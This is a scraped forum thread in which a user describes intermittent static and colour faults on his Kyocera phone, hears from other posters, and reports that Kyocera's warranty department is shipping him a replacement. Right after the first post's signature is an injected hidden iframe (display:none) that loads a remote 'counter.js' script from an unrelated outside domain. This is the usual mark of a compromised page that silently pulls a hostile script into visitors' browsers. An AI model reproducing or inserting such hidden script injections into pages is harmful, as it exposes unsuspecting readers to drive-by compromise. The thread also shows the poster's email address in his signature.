+ Reply to Thread

Display problems

So this morning I started getting weird display problems. It almost looked like static on the screen, and escalated to color changes with static.

I did about 6 soft resets of the phone to no avail.

Decided that it might be software related so I did a back up and a hard reset. Nothing...same display problem.

Put the back up back on and the phone is fuctioning as normal, but with the intermittent display problems. It will pop back to normal for a few minutes but then the colors change and it gets the static look again. I tend to think it has something to do with the cables in the hing, as when I open or close it, it changes.

Called Kyo tech support and they took my info. They will call back in a few hours to run down my options.

Anyone run into a display problem like this? And...this SHOULD be covered by the warranty....right??????

Thanks

Jeff<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Sounds like a manufacturer's defect to me, which should definitely be covered by warranty.
    Michael

Re: Display problems

Originally posted by djjefft
    Called Kyo tech support and they took my info. They will call back in a few hours to run down my options.

Anyone run into a display problem like this? And...this SHOULD be covered by the warranty....right??????
    Kyocera should take good care of you. From what I've read around here (and from my own personal experience back in the "battery meldown" days) they seem to be swapping units without much hassle. Let us know what they tell you later
    Please visit my picture site: Robert-O-Rama :)

Dead Phone

My phone completely died today. I tried to load the Quickoffice demo software and my phone completely crashed. I talked to Kyocera and I'm waiting for a response. I've already sent the phone back and I'm waiting for a replacement.
    Go UM Terps!!

Re: Re: Display problems

Originally posted by Robert K.
    Kyocera should take good care of you. From what I've read around here (and from my own personal experience back in the "battery meldown" days) they seem to be swapping units without much hassle. Let us know what they tell you later
    Hmmm, no call back. Guess I will be all over them at 9am when they open.

What do you think my options will be?

I'm sure they can fix my device, but then I would have to send it to them...and WAIT to get it back.

OR, I guess they could send me another unit (will it be refurbished) and I can send mine back when I get the new one. Will it have a nasty ALLTEL logo on it????

The last 24 hours have been torture...

Jeff
    Jeff
    Tampa FL

Re: Re: Re: Display problems

Originally posted by djjefft
    Hmmm, no call back. Guess I will be all over them at 9am when they open.

What do you think my options will be?

I'm sure they can fix my device, but then I would have to send it to them...and WAIT to get it back.

OR, I guess they could send me another unit (will it be refurbished) and I can send mine back when I get the new one. Will it have a nasty ALLTEL logo on it????

The last 24 hours have been torture...

Jeff
    Yeah, I would be calling them too! I haven't heard of anybody getting their 7135 "fixed" by Kyocera and then sent back. I would push pretty hard for a new one... I hate refurbs. Odds are that if you got a refurb it probably belonged to somebody here on the boards the first time around
    Please visit my picture site: Robert-O-Rama :)

the update

30 minutes on hold. Talked to the tech, and all he could tell me is that my case has been reassigned for 'a replacment unit' and that someone should call me within 5 hours.

So...if no call by 3pm...I try again...

Jeff
    Jeff
    Tampa FL

Well I must have been their first call of the day.

I spoke with a very nice guy named Edward.

I had the option of sending my current phone in for repair, or getting another unit shipped to me and sending mine back in.

Since I would be without my phone for a week had I picked option #1, I went with option #2. The only drawback is the $770 hit on your credit card that gets credited upon your original phones return.

I requested a new unit as opposed to a refurb, and he said I should get one.

Expect to see it tomorrow or Monday, and since it's 8am there, it should go out today for Sat am delivery.

All in all a good experience with the tech support/warranty department at Kyocera.

Jeff
    Jeff
    Tampa FL